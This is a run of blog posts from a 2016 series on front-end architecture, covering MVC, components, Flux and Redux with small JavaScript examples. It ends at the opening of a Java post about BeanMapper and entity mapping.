See it in action here: <a href="http://gaearon.github.io/react-hot-loader/">http://gaearon.github.io/react-hot-loader/</a><br />
<br />
<h3>
Server Side Rendering</h3>
The third benefit of Redux's approach to state is that it is easier to do server side rendering via Universal JavaScript. Universal JavaScript is the idea that the same code you run on the browser can be run on a <a href="https://nodejs.org/">Node.js</a> server as well.<br />
<br />
The idea is simple: you use a Node.js server to run your JavaScript code which generates the HTML, using the same code which normally runs on the browser. The HTML is sent over the network to the browser, the browser will then display the page as it normally does. The user will see the page instantly as soon as it is loaded, giving a better User Experience. Web crawlers such as Google and Bing can crawl the page too which helps your rankings.<br />
<br />
The JavaScript is still also sent to the browser. It will start up and detect that there is already an initial state, as sent by the server. The JavaScript will then start up and make the page dynamic again. This process of 'attaching' to the HTML is called hydration.<br />
<br />
The reason this is easy to do with Redux is because the state is in one single Store. Creating the HTML is a function of: `application(initialState) => HTML` regardless of architecture. In Redux to set the initial state you simply assign a single value to the Store, making this process easier.<br />
<h2>
Cons of using Redux</h2>
<h3>
We are not in Kansas anymore</h3>
Redux has a weakness: it is not always easy to learn. Immutable, Pure Functions, Reducers, Dispatchers, Thunks, etc etc.<br />
<br />
While all of these things are not that difficult to learn, there are many of them. Thinking about Components and applications with these new concepts requires you to learn a new philosophy, and a different way of doing things.<br />
<br />
The pay-off for learning these how ever is immense. They give you a completely new look at how state can be managed.<br />
<br />
<h3>
Immutability</h3>
The idea basic principle of Redux is relatively easy to learn. Each action produces a function which takes the state and returns a new state: `newState = action(oldState)`.<br />
<br />
However their is one important caveat you cannot mutate the oldState instead you must always create an entire new state. Otherwise the goodies such as time travel debugging and hot reloading will not work. This means that you as a developer must be constantly aware of the fact that you must not mutate the state.<br />
<br />
It would be really handy if variables in JavaScript were immutable. A variable is immutable if the state of that variable cannot be changed. The benefit of immutability is that you never have to be afraid of something changing variables value.<br />
<br />
For example:<br />
<pre><code class="javascript">
/*
Lets say we have an array of names and we want to print them
to the console joined by a comma.
*/
var names = ["Kwik", "Kwek", "Kwak"];
/*
This function printArrayJoined comes from some external library.
We think this function just prints the names joined by a comma.
Unbeknown to us the printArrayJoined actually mutates the array!
At the end of this function it will be empty.
*/
function printArrayJoined(array) {
var out = '';
var length = array.length;
while(length !== 1) {
out += array.shift() + ", ";
length -= 1;
}
out += array.shift();
console.log(out);
}
printArrayJoined(names); // prints "Kwik, Kwek, Kwak"
// At this point the names array is empty. Not what we expected.
console.log(names); // prints []
</code>
</pre>
You can see it work here: <a href="http://codepen.io/anon/pen/aNxZex?editors=0011">http://codepen.io/anon/pen/aNxZex?editors=0011</a><br />
<br />
The printArrayJoined mutated the array which was unexpected. Had the printArray been defined as:<br />
<pre><code class="javascript">
function printArrayJoined(array) {
var out = array.join(',');
console.log(out);
}
</code>
</pre>
Everything would be fine as 'join' is not a mutating function, it does not alter the array in any way. You can see it live here: <a href="http://codepen.io/anon/pen/GZLjKj?editors=0011">http://codepen.io/anon/pen/GZLjKj?editors=0011</a><br />
<br />
In languages such as <a href="http://elm-lang.org/" target="_blank">Elm</a>, which is a big inspiration for both React and Cycle.js, or <a href="https://clojure.org/" target="_blank">Clojure</a> immutability is built right into the language itself. In JavaScript this is not the case.<br />
<br />
When writing Redux reducers you must be constantly aware of what you are writing to make sure you are not mutating state.<br />
<br />
Redux has a great philosophy about how to manage state but unfortunately the language JavaScript does not make it easy to adhere to it. You will at times fight the language when writing reducers.<br />
<br />
You could however use a library such as <a href="https://facebook.github.io/immutable-js/">Immutable.js</a> to get immutable collections. However it does come at the expense of having yet another abstraction.<br />
<h2>
Resources</h2>
The inventor of Redux: Dan Abramov has a great video showing of time travel debugging and Hot Reloading: <a href="https://www.youtube.com/watch?v=xsSnOQynTHs">https://www.youtube.com/watch?v=xsSnOQynTHs</a>.<br />
<br />
He also has a great free course on <a href="https://egghead.io/series/getting-started-with-redux" target="_blank">egghead</a> about how to get started with Redux.<br />
<h2>
Reactive Programming</h2>
Now that we have seen Redux the most used Flux-like library it is time to look at a new architecture in the next weeks.<br />
<br />
One of the criticisms about React is that it is not truly reactive, even though the name 'React' suggests it and that Reactive Programming would be a better model.<br />
<br />
<a href="http://dontpanic.42.nl/2016/07/reactive-programming.html">Next week</a> we will take a look at Reactive Programming and see what the fuss is all about.<br />
<div>
<br /></div>
Anonymousnoreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-54001376153262019272016-07-07T17:28:00.000+02:002016-07-15T09:59:25.764+02:00Post-MVC part 4: Enter the Flux<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-age.html" target="_blank">Last week</a> we discovered that Component based applications are trees. We saw that Components can only communicate one level up the tree and one level down. If a Component wants to communicate with his 'siblings' he will have to to that via his parent.</div>
<div>
<br /></div>
<div>
We also learned that the state of the application resides in the Components, but that it is not always apparent where the state should live.</div>
<div>
<br /></div>
<div>
The intercommunication between Components and the location of the state can make Component based applications complex. This week we are going look into a architecture called 'Flux' in order to see how this complexity can be tackled. </div>
</div>
<h2>
Enter the Flux</h2>
<div>
<div>
<a href="https://facebook.github.io/react/" target="_blank">React</a> is a Component based View library from Facebook. It popularized the Component based approach and made it mainstream.</div>
<div>
<br /></div>
<div>
Facebook at some point <a href="https://facebook.github.io/flux/docs/overview.html#content" target="_blank">discovered</a> the weakness of traditional MVC and created a new way of managing state. They created Flux an architecture that uses a unidirectional data flow.<br />
<br />
<a href="http://2.bp.blogspot.com/-6qIy26Jur2E/V3508RbcYVI/AAAAAAAAAE0/4XKyCOD6IrA4a1IiUZZdSwAYcabzOXqOgCK4B/s1600/flux-react.png" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-6qIy26Jur2E/V3508RbcYVI/AAAAAAAAAE0/4XKyCOD6IrA4a1IiUZZdSwAYcabzOXqOgCK4B/s1600/flux-react.png" /></a></div>
</div>
<div>
<a name='more'></a></div>
<h2>
What the Flux</h2>
<div>
<div>
Traditional MVC is bi-directional which means that the Model, View and Controller can communicate with each other. This is also the same for the Component architecture we saw last week.</div>
<div>
<br /></div>
<div>
Flux advocates having a unidirectional data flow, meaning that all state flows one way, from the top to the bottom. We still have a Tree of Components like before, but Flux will handle the intercommunication and storing the state.</div>
<div>
<br /></div>
<div>
Lets look at the various concepts in the Flux architecture.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
Store</h3>
<div>
<div>
A Store contains logic and data and acts as the 'store' for a particular domain. For example in a Todo MVC application we would have a store for the Todo's. The TodoStore would then know how to add a Todo and keep track of the list of Todo's.</div>
<div>
<br /></div>
<div>
By having a Store the location of the 'state' is very transparent. The need for a particular Component to internalize the state is no longer needed. The decision we had to make last week between storing the todo's in either the TodoList or the TodoApplication is moot.</div>
<div>
<br /></div>
<div>
Multiple stores can be made for the various entities in your domain.</div>
<div>
<br /></div>
<div>
Stores register themselves to the 'Dispatcher' to receive actions which originate from the views. Lets look at the views before looking at the Dispatcher.<br />
<br /></div>
</div>
<h3>
</h3>
<h3>
View and Controller-Views</h3>
<div>
<div>
Flux has two types for View's the: regular View and Controller-Views. Behind the scenes they are simply regular Components the distinction is in their behavior. </div>
<div>
<br /></div>
<div>
The normal views are just regular Components representing a kind of graphical widget. The Controller-Views are views that register to the various stores to receive callbacks for when the data in the store changes. Their jobs is to provide the normal views with the data they need to correctly render, they help keep the normal views easy to understand.</div>
<div>
<br /></div>
<div>
For example in a Todo application we have a TodoListComponent which is a Controller-View, it registers itself to changes from the TodoStore. The TodoListComponent in turn renders TodoComponents which are regular View's. The TodoComponent will be composed out of multiple other subcomponents which are regular views. The TodoListComponent is more complex, as it listens to the store, but helps keep the other sub components plain and simple.</div>
<div>
<br /></div>
<div>
So a Controller-View helps render the state from a Store. But how is the state from a store manipulated? The answer is via Actions, which are created when an event occurs on a view, for example when a button is clicked or an input field is filled in. The view will then dispatch an action to the dispatcher.</div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3>
Dispatcher</h3>
<div>
<div>
The dispatcher job is to receive the actions and route them to the correct Stores. The Stores register themselves to the dispatcher so they can receive actions via callbacks. A Store can then act on a particular Action.</div>
<div>
<br /></div>
<div>
Note that there is only one Dispatcher per application. You could say that it is a <a href="http://www.blackwasp.co.uk/Singleton.aspx" target="_blank">singleton</a>. The Dispatcher itself contains no business logic, its job is to simply route and receive actions.</div>
<div>
<br /></div>
<div>
For example a view could dispatch an AddTodo action which is a simple object such as:</div>
</div>
<pre><code class="javascript">
{
type: 'ADD_TODO',
text: 'Buy groceries.'
}</code></pre>
<div>
<br />
The dispatcher will inform the stores via callbacks. A TodoStore could listen to this event like so:</div>
<pre><code class="javascript">
var todoStore = [];
Dispatcher.register(function(action) {
if (action.type === 'ADD_TODO') {
todoStore.push({complete: false, text: action.text});
}
});
</code></pre>
<div>
<br />
In the view (Component) which represents the list of Todo's the Todo will then be added.<br />
<h2>
Benefits of Flux</h2>
</div>
<div>
<div>
<div>
One benefits of Flux the 'action' is decoupled from the 'store'. This makes it possible to send the same action, to the dispatcher, from different Components, whilst still performing the same action. </div>
</div>
<div>
<br /></div>
<div>
Imagine that in our Todo application there are three ways to add a new todo:</div>
</div>
<div>
<ol>
<li>A new Todo input and button, aka the normal way to add a todo.</li>
<li>A duplicate Todo button next to an existing Todo.</li>
<li>A group of buttons for adding predefined Todo's for quickly adding todos.</li>
</ol>
<div>
<div>
These three Component will all send the exact same action to the dispatcher. The TodoStore will add the new Todo to the array when the event occurs. The TodoStore is not aware of the origin of the action, the Components sending the actions are not aware what happens when the actions are</div>
<div>
received. In other words the producer of the action is not coupled to the consumer of the action.</div>
<div>
<br /></div>
<div>
Because they are decoupled we get some freedom to refactor the code of the producer without affecting the consumer or vice versa. In the example the todo's were kept in an array. If for some reason we would want to keep them in another data-structure we would change the Store, but not all components listening to them.</div>
<div>
<br /></div>
<div>
This also works the other way around. If we decide that the duplicate Todo button is not useful we can remove it without having to update the store, or the dispatcher.</div>
<div>
<br /></div>
<div>
Conceptually unidirectionality is easier to understand too. The constraint that 'state' flows down makes it easy to reason about where the state came from. When you are working on a Component such as the TodoComponent you know that the Todo itself came from above.</div>
<div>
<br /></div>
<div>
When you want to trigger and event from a Component you simply dispatch it via the Dispatcher, you do not have to worry about how to 'reach' a cousin component. No 'indirect' relationships in the Tree of Components exist, such indirect relationships make understanding the whole application more difficult.</div>
</div>
</div>
<h2>
Variations of Flux</h2>
<div>
<div>
When Flux was announced by Facebook they explained the idea of Flux but did not provide an actual library or framework for using Flux. Flux was so compelling however that multiple implementations started popping up. Such as <a href="https://github.com/acdlite/flummox" target="_blank">Flummox</a>, <a href="http://alt.js.org/guide/" target="_blank">Alt</a>, <a href="https://github.com/reflux/refluxjs" target="_blank">Reflux</a> etc etc.</div>
<div>
<br /></div>
<div>
Each variation would do things slightly differently compared to the original Flux architecture. But soon a new contender for the crown entered the stage: <a href="https://github.com/reactjs/redux/" target="_blank">Redux</a>.</div>
<div>
<br /></div>
<div>
It took the ideas of Flux and improved upon them, it is currently the most popular Flux derivative out there, <a href="http://dontpanic.42.nl/2016/07/redux.html">next week</a> we will discover why.</div>
</div>
Anonymousnoreply@blogger.com5tag:blogger.com,1999:blog-8962763253387334081.post-5772764590239058872016-06-30T19:24:00.000+02:002016-07-07T17:29:06.881+02:00Post-MVC part 3: Post-MVC Age<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html" target="_blank">Last week</a> we learned that the various MVC frameworks all share a the same abstraction called the Component, and that the Component is a tiny MVC application wrapped in one construct. More and more frameworks are using Components all the way down, this week we learn how an application which only uses Components works.</div>
<div>
<br /></div>
<div>
I call this the Post-MVC Age. </div>
<h2>
Post-MVC Age</h2>
<div>
If we built our entire front-end applications with Components instead of using MVC how would that work? In this post I want to show you how to do just that. We will also discover some of the weaknesses of the Component model regarding state.</div>
</div>
<div>
<a name='more'></a><h2>
Applications are Trees</h2>
</div>
<div>
<div>
Lets start at the beginning: given that our application is written with Components we must define the "first" Component. This Component represents the "entire" application. Of course this Component is composed out of other Components which will in turn be composed of Components.</div>
<div>
<br /></div>
<div>
The application will be Components all the way down.</div>
</div>
<div>
<br /></div>
<div>
<div>
Basically a Component based application is a Tree. A Tree of components. The 'first' Component can be viewed as the root Component: the starting point of the tree. Each sub Component is a node inside of that tree.</div>
<div>
<br /></div>
<div>
Lets imagine a simple Todo List application. The tree would look something like this:</div>
</div>
<div>
<br /></div>
<pre>TodoApplication
├── AddTodo
│ ├── Input
| ├── Button (add todo)
├── TodoList
│ ├── Todo
| │ ├── Toggle
| │ ├── Button (trash)
└── Filters
├── Filter (all)
├── Filter (complete)
├── Filter (active)
</pre>
<br />
The TodoApplication is the root Component. All other Components are directly descendant of this Component.<br />
<br />
The AddTodo Component is responsible for adding Todo's behind the scenes, it is an Input with a submit button.<br />
<br />
The TodoList component renders the current todos, it does so by rendering each todo via the Todo Component using a loop. The Todo Component has a button to toggle the Complete status of the Todo, and a button to remove the todo completely.<br />
<br />
The Filters component renders a list of 'filters' which the user can use to filter the todo's. There is a filter for showing all todos, a filter for showing all complete todos, and a filter for showing all active (non complete) todos.<br />
<h2>
The Tree and the State</h2>
<div>
<div>
But what about the state of the application. Where do the todos actually live? Somewhere an array of todos's must be kept as an internal state of a Component. If you look at the tree you might thinks it would be either the TodoApplication or the TodoList Component.</div>
</div>
<div>
<br /></div>
<div>
<div>
Lets investigate both options, however it is important to keep in mind that a Component can only communicate one level up or one level down in the tree. Remember a Component is an island which has very specific communication channels. If a Component wants to 'talk' to a sibling he must do so via the parent. If a Component wants to 'talk' to his grandchild he must do so via his own child Component.<br />
<br /></div>
</div>
<h3>
The TodoApplication Component</h3>
<div>
<div>
Option A is in the TodoApplication:</div>
<div>
<br /></div>
<div>
If the TodoApplication Component holds the todos then they can then be passed down to the TodoList component. When a filter is clicked it reports it back to the TodoApplication Component, where the todos can immediately be filtered. When the AddTodo's submit button is clicked he communicates it back directly to the TodoApplication via an event. This event can then hold the text of the todo the user entered.<br />
<br /></div>
</div>
<h3>
The TodoList Component</h3>
<div>
<div>
Option B is in the TodoList:</div>
<div>
<br /></div>
<div>
The TodoList Component can keep the actual reference to the todos. When a filter is clicked it reports it to the TodoApplication which routes the event to the TodoList. Same for the AddTodo Component when a todo is added: a call is made to the TodoApplication which routes it back to the TodoList.</div>
</div>
<h2>
Lots of little Channels, lots of little States</h2>
<div>
<div>
Given the two options which option would be the best? I think the answer may be neither solution is optimal.</div>
<div>
<br /></div>
<div>
The problem with both solutions is that the the state of the application as a whole is difficult to reason about. Because each Component internalizes a part of the state. Where does the active filter live? Where do the todos live? There are lots of little islands which have lots of little pieces of state.</div>
</div>
<div>
<br /></div>
<div>
<div>
In both solutions multiple events are routed through Components without them actually doing anything with them except to pass them on. This makes tracing events through the tree very difficult to reason about. There are too many channels producing too much noise.</div>
</div>
<div>
<br /></div>
<div>
<div>
Whilst each Component is still relatively easy to understand in isolation, the whole picture is blurred. The reason for this is that Components are talking to each other in a bi-directional manner. </div>
<div>
<br /></div>
<div>
In short information is flowing all over the place.</div>
</div>
<h2>
We need to talk about state</h2>
<div>
<div>
One of the downsides of the traditional MVC pattern is that state was difficult to manage, because state manipulation could happen in multiple places. </div>
<div>
<br /></div>
<div>
This downside also appears in the Component only model: state is difficult to manage, but not for the same reasons as in MVC. The reason is because there is communication between components which goes in both directions and sometimes through multiple components.</div>
<div>
<br /></div>
<div>
So whilst a Component itself is still easy to understand. The whole application is a complex web of communication. In the <a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">next weeks</a> we will look into the various strategies that the community came up with to tackle this complexity.</div>
</div>
Anonymousnoreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-17931155920874396492016-06-23T16:12:00.000+02:002017-04-22T11:32:08.477+02:00Post-MVC part 2: MVC and JavaScript<h2>
Intro</h2>
<div>
<div>
<a href="http://dontpanic.42.nl/2016/06/post-mvc-we-need-to-talk-about-state.html" target="_blank">Last week</a> we discussed what MVC is and how it was used to render application and websites from the server. But our application's user interfaces became too ambitious and our code became spaghetti. This week we will discuss MVC and JavaScript, and the birth of the Component.</div>
</div>
<h2>
MVC and JavaScript</h2>
<div>
<div>
Taking full control of the UI meant things had to be programmed on the browser side. Meaning that things had to be programmed in JavaScript.</div>
<div>
<br /></div>
<div>
This gave rise to the era of the browser based MVC controller frameworks. <a href="http://backbonejs.org/" target="_blank">Backbone</a> was the early pioneer showing us that we could straighten our jQuery Spaghetti. <a href="https://angularjs.org/" target="_blank">Angular</a> and <a href="http://emberjs.com/" target="_blank">Ember</a> improved upon Backbone by giving us automatic bindings, when the model changed the views were automatically updated.</div>
<div>
<br /></div>
<div>
Backbone, Ember, Angular are all MVC frameworks, which took the tried and true architectural pattern, and allowed us to make great applications.</div>
<div>
<br /></div>
<div>
And for a while everything was good.<br />
<br />
<a name='more'></a></div>
</div>
<h2>
Trouble in paradise</h2>
<div>
<div>
But there was trouble brewing in paradise.</div>
<div>
<br /></div>
<div>
MVC comes with a particular problem: it is very difficult to reason about what is going on in a larger application. Once you have multiple Controllers and Views which manipulate the same Model things get confusing. </div>
<div>
<br /></div>
<div>
Imagine an application for buying and selling groceries. Which has a model for the 'Shopping cart' of what the user wants to order. The model for the shopping cart can be manipulated through various ways:</div>
<div>
<ol>
<li>Opening the shopping cart detail page and removing items.</li>
<li>Opening a product detail page and pressing 'add to cart'</li>
<li>Clicking on special banners giving personalized discounts.</li>
</ol>
</div>
<div>
Each of these three ways have their own View and Controller, but share the same Model of the shopping cart. If you were to create a graph of the relationships between these objects you will find that things get very complex.</div>
<div>
<br /></div>
<div>
Each new View and Controller adds ways in which the state of the model can be manipulated. Trying to mentally understand shopping cart's state and how it can be influenced becomes difficult if not impossible. If a bug triggers things to be added to the cart twice, where do we look? It could be in any of the three controllers and views that influence the shopping cart.</div>
<div>
<br /></div>
<div>
The 'shopping cart' example shows how a Model for a single entity can be difficult to manage. Imagine a situation were multiple entities can affect each other, the mental gymnastics you will need to perform to keep the whole picture in your head would be heroic.</div>
<div>
<br /></div>
<div>
To figure out how we can solve this problem we need to make a detour.</div>
</div>
<h2>
Abstracting Views</h2>
<div>
<div>
Consider what a view is. A view normally shows a bunch of widgets on the screen for the user to interact with. A button here, a table there and some input elements on the side. We can use them to manipulate and view the Model.</div>
<div>
<br /></div>
<div>
In our applications we almost never use the basic HTML widgets as is. We style them using CSS to change their appearance. We also give them new behaviors such as an auto-complete functionality. Sometimes we even create completely new Widgets such as a 'Maps' widget to show a geographical location.</div>
<div>
<br /></div>
<div>
Of course we abstract these widgets away into reusable code. In Angular we might make a bunch of directives. In Ember we would create Components. They have different names but they represent the same principle.</div>
<div>
<br /></div>
<div>
Our Views are basically build using regular HTML and these widget abstractions the various MVC frameworks provide.</div>
<div>
<br /></div>
<div>
The common term for these abstractions is called "Component".</div>
</div>
<h2>
The birth of the Component</h2>
<div>
<div>
A Component is like an island. It has nothing to do with the outside world, as such that it will not affect it. This means you can use the same Component multiple times on the same View without them interfering with each other.</div>
<div>
<br /></div>
<div>
Since a Component is isolated from the rest of the system, that means that if you want to interact with the Component you must send messages to it. But the same is true the other way around, if the Component wants to talk to the outside world he must send messages to the outside as well.</div>
<div>
<br /></div>
<div>
The great benefit of having isolate components is that they are easy to reason about, to understand how the component works you can study just the components source. If you know a components incoming messages and outgoing messages you understand how to use the component.</div>
<div>
<br /></div>
<div>
There is a proposal to make Components available in the web natively called: "<a href="http://webcomponents.org/" target="_blank">Web Components</a>". The proposal is to make it possible for us to create truly isolated components with their own tags.</div>
</div>
<h2>
Study of a Google Maps Component in Polymer</h2>
<div>
<div>
Google Maps is a service by Google which shows geographical maps in the browser. Using <a href="https://www.polymer-project.org/1.0/" target="_blank">Polymer</a>, which is a framework made by Google to create web components, Google made a <a href="https://elements.polymer-project.org/elements/google-map" target="_blank">component for Google Maps</a>:</div>
<div>
<br /></div>
<div>
To use the Component we write the following HTML:<br />
<pre><span style="font-family: "courier new" , "courier" , monospace;"><google-map fit-to-markers="" latitude="37.77493" longitude="-122.41942">
<google-map-marker draggable="true" latitude="37.779" longitude="-122.3892" title="Go Giants!">
</google-map-marker>
</google-map></span></pre>
If you study the code snippet above it is easy to guess what the Component does. It creates a google-map widget centered on a particular longitude and latitude but is wide enough to fit all markers. Inside the map there is a marker on a coordinate which is draggable and has the title: 'Go Giants'.<br />
<br />
The point is that a Component is very declarative in use. You don't write how you want something to get done, you write what you want the end result to be.<br />
<br />
The Google Maps Component itself can be very complex. I imagine that it is certainly not trivial to implement the code behind it. However the usage of the component is not difficult at all, it has a very simple interface.<br />
<br />
To communicate with the component that we want another latitude and longitude we simply change the attribute on the <google-map>'s element. The same goes for the title of the marker.<br />
<br />
If the Component wants to communicate with us we must listen to the correct channel. A component in Polymer communicates through events. For example to listen to a click on the map:<br />
<br />
<pre><code class="javascript">var map = document.querySelector('google-map');
map.addEventListener('google-map-click', function(e) {
alert('The user clicked on the Map!');
});</code>
</pre>
The channel in this case would be the 'google-map-clicked' string. With it we tell the Google Map Component that we are interested in these type of events. The callback function lets us 'do our thing' when that event actually occurs. The Component however stays responsible for determining when the event takes place. The Component calls the outside world.<br />
<br />
The concept of Components are implemented in various frameworks such as: <a href="https://facebook.github.io/react/docs/component-api.html" target="_blank">React</a>, <a href="https://angular.io/docs/ts/latest/guide/architecture.html" target="_blank">Angular 2.0</a>, <a href="http://emberjs.com/api/classes/Ember.Component.html" target="_blank">Ember</a> and <a href="https://www.polymer-project.org/1.0/docs/devguide/feature-overview.html" target="_blank">Polymer</a>. A Component's "code" will be different in each framework, but they follow the same principles: isolation, declarative interfaces, and explicit channels of communication.<br />
<h2>
A realization about Components</h2>
</div>
</div>
<div>
<div>
A Component has behaviors and a look and feel, it also has a state. For example: a button component can be enabled or disabled, a person component shows a certain person's details the person which is shown is the state.</div>
<div>
<br /></div>
<div>
Reading the above paragraph it might dawn upon you that a Component is in some ways a version of MVC, but on a much smaller level. A Component has behaviors which map to the Controller. A Component has a look and feel which maps to the View. A Component has some state which maps to </div>
<div>
the Model.</div>
<div>
<br /></div>
<div>
Can a Component do anything an normal MVC pattern can do? The answer is yes. If a Component can do anything a normal MVC pattern can do, why do we still use traditional MVC, why not go all in with Components. They are more declarative, they are easier to reason about because they live in isolation, they fit in one single file.</div>
<div>
<br /></div>
<div>
But what about the View that ties all Components together surely we need those? The answer is no. You can define Components in terms of other Components, using them as building blocks to create new abstractions. This capability can completely replace the traditional View.</div>
<div>
<br /></div>
<div>
This realization was the beginning of the Post-MVC Age. Which is the topic of <a href="http://dontpanic.42.nl/2016/06/post-mvc-age.html" target="_blank">next week's post</a>. In that post we will try to discover how an application that uses only Components works.</div>
</div>
Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-19354003021926445362016-06-16T12:00:00.000+02:002016-06-23T16:31:37.465+02:00Post-MVC part 1: We need to talk about MVC <h2>
Intro</h2>
<div>
<div>
In this series of blog posts I want to take a look past traditional MVC for the front-end. There have been lots of developments in architectures that do not look like MVC at all such as Flux and Reactive Programming.</div>
<div>
<br /></div>
<div>
The goal of this series is to show you how these other architectures came into being, the problems they try to solve, and how they relate to each other. This series is not an exhaustive tutorial on these new architectures instead it seeks to provide you information on a more conceptual level.</div>
</div>
<h2>
We need to talk about MVC</h2>
<div>
<div>
For a long time MVC has been our golden goose. It became our GOTO pattern for creating user interfaces. It has been been so ubiquitous that for a long time if someone create a new framework for handling User Interfaces, you would automatically assume that it is an MVC framework.</div>
<div>
<br /></div>
<div>
But 'The times they are a changin'. MVC for the front-end seems to be dying of in favor of something "else". This is the first part of a series of blog post trying to figure out what this "else" is.</div>
<div>
<br /></div>
<div>
But first we must define what MVC is.<br />
<br />
<br />
<a name='more'></a></div>
</div>
<h2>
Where did MVC come from?</h2>
<div>
<div>
In the 1970's a very talented group of people where working at Xerox's legendary Palo Alto Research Center (PARC). The home of many revolutionary ideas for the Graphical User Interface. It is the place where Steve Jobs famously got some of the ideas for the Apple computer.</div>
<div>
<span id="goog_554422236"></span></div>
<div>
<br />
So in the 70's they had a programming language called Smalltalk. Smalltalk offered an development environment in which you could graphically debug and inspect your program. Which was at the time revolutionary.</div>
<div>
<br /></div>
<div>
It comes to no surprise to me this same bedrock gave birth to the invention of the Model View Controller architecture.</div>
<div>
<h2>
MVC: a definition</h2>
</div>
</div>
<div>
<div>
MVC stands for Model View Controller. Three concepts for structuring your code. The Model represents the 'state' of the application. The state of the application is rendered by the View. The Controller manipulates the Model which in turn updates the View. The View offers widgets such as text area's and radio buttons to trigger the actions in the Controller which manipulate the Model.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Dpxnzr02rRo/V2JycUjUutI/AAAAAAAAAEE/URM03XsQoU4po2Ei32DLB9ey1w1gOwP9ACLcB/s1600/500px-MVC-Process.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Image visually explains how Model View Controller relate to each other." border="0" height="320" src="https://3.bp.blogspot.com/-Dpxnzr02rRo/V2JycUjUutI/AAAAAAAAAEE/URM03XsQoU4po2Ei32DLB9ey1w1gOwP9ACLcB/s320/500px-MVC-Process.svg.png" title="Model View Controller" width="290" /></a></div>
<div>
It is the delicate interplay of three components which make Graphical User interfaces come to life.</div>
</div>
<h2>
MVC and the Web</h2>
<div>
<div>
It didn't take long before the web also started using MVC as a pattern to structure applications. Many server side MVC frameworks started popping up such as:</div>
<div>
<ul>
<li><a href="http://docs.spring.io/autorepo/docs/spring/4.2.x/spring-framework-reference/html/mvc.html" target="_blank">Spring MVC</a></li>
<li><a href="https://www.djangoproject.com/" target="_blank">Django</a></li>
<li><a href="http://rubyonrails.org/" target="_blank">Ruby on Rails </a></li>
</ul>
</div>
<div>
The Model would represent an Entity which was stored in a Database. It would often simply directly map on a row in a particular database table.</div>
<div>
<br /></div>
<div>
The Controller was often defined as the place where HTTP request entered the application and where HTTP Responses where returned.</div>
<div>
<br /></div>
<div>
The View was the 'template' which took some Models and rendered the desired page. A Controller would send the complete View back to the browser.</div>
<div>
<br /></div>
<div>
MVC as a term had however lost some of its meaning. The jump from a standalone desktop application to a client-server model muddled the definitions of each 'letter' a little.</div>
<div>
<br /></div>
<div>
Should a model be 'fat' and be responsible for retrieving itself from database? Or should a model be lean and simply be used as an Object and let some Repository handle filling the data? Aka should we use the <a href="https://en.wikipedia.org/wiki/Active_record_pattern" target="_blank">ActiveRecord</a> pattern or the <a href="http://martinfowler.com/eaaCatalog/repository.html" target="_blank">Repository Pattern</a>?</div>
<div>
<br /></div>
<div>
Should a controller contain view logic? Should a model contain view logic?</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Every framework answers these questions differently. In this regard MVC means something different per framework. Also slight variations on MVC started popping up such as: <a href="https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93viewmodel" target="_blank">Model View ViewModel</a> (MVVM) and <a href="https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter" target="_blank">Model View Presenter</a> (MVP) adding to the confusion.</div>
<div>
<br /></div>
<div>
MVC is ubiquitous but that does not mean everyone's definition of MVC is the same!</div>
</div>
<h2>
Web Applications</h2>
<div>
<div>
At one point the web moved from having only websites to also having web-applications.</div>
<div>
<br /></div>
<div>
A web application behaves more like classic desktop application, they can be games or serve a specific business needs. For example a web application could:</div>
<div>
<ol>
<li>Manage a power grid for a utility company.</li>
<li>Manage inventory for a store.</li>
<li>Provide an interface to buy and trade stocks.</li>
<li>Manage git repositories for an IT company.</li>
</ol>
</div>
<div>
For a time we built web-applications with the same technology as we did our websites. They were server side applications that used JavaScript to enhance the usability of our web-applications. As time passed we wanted to do more and more complex things with our User Interfaces. The JavaScript behind those applications soon became spaghetti code.</div>
<div>
<br /></div>
<div>
In those days we would often use <a href="https://jquery.com/" target="_blank">jQuery</a>. jQuery marries the DOM and JavaScript via CSS selectors. Changing the DOM's structure could break your JavaScript behavior. The result was a very brittle application.</div>
<div>
<br /></div>
<div>
We needed to step away from the traditional fat server thin client model. In which the browser was simply used as a rendering tool for the UI, with some JavaScript to enhanced the User Experience. To a model in which the browser took full charge on how the UI was rendered.</div>
<div>
<br /></div>
<div>
Soon we started rendering our applications using JavaScript MVC frameworks. Which is the topic of the next blog post in this series: <a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html" target="_blank">MVC and JavaScript</a>.</div>
</div>
Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-28893259031825789442016-02-23T08:23:00.002+01:002016-02-23T08:27:07.221+01:00The Case for BeanMapper<h2>Introduction</h2>
<p>For a Spring Web developer, the situation is probably well known; you have an Entity, defined as a class that is persisted to some kind of persistence layer. The Entity must be partially exposed to the outside world and the Entity must be creatable and updatable.</p>
<img alt="mapping_with_entities" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqDuLHL-C1MQeGqev9fOPro0vzXrdHCbKdK7t31sk_t7azaFXHe1hO2mug5i_S9Z5cNKiYD5meDI45_raqv9S71Pg-vU9h0THO6W-okYDAsgDoWuJicKRDFH5kaNR6a1X0-AFZ1TziGWJL/s1600/mapping-with-entities.png" />
<a name='more'></a>
<p>Typically, Jackson would be instructed to map the JSON to the Entity when a create/update takes place, and the Entity to JSON when a read request takes place.</p>
<p>Let us assume we have the following Entity class (JPA annotations removed):</p>
<pre><code class="java">
public class Car {
private Long id;
private String overrideCode;
private String licensePlate;
private String owner;
private List<Car> relatedCars; // deep fetch tree
// appropriate getters & setters
}
</code></pre>
<h2>Problem - Lack of control</h2>
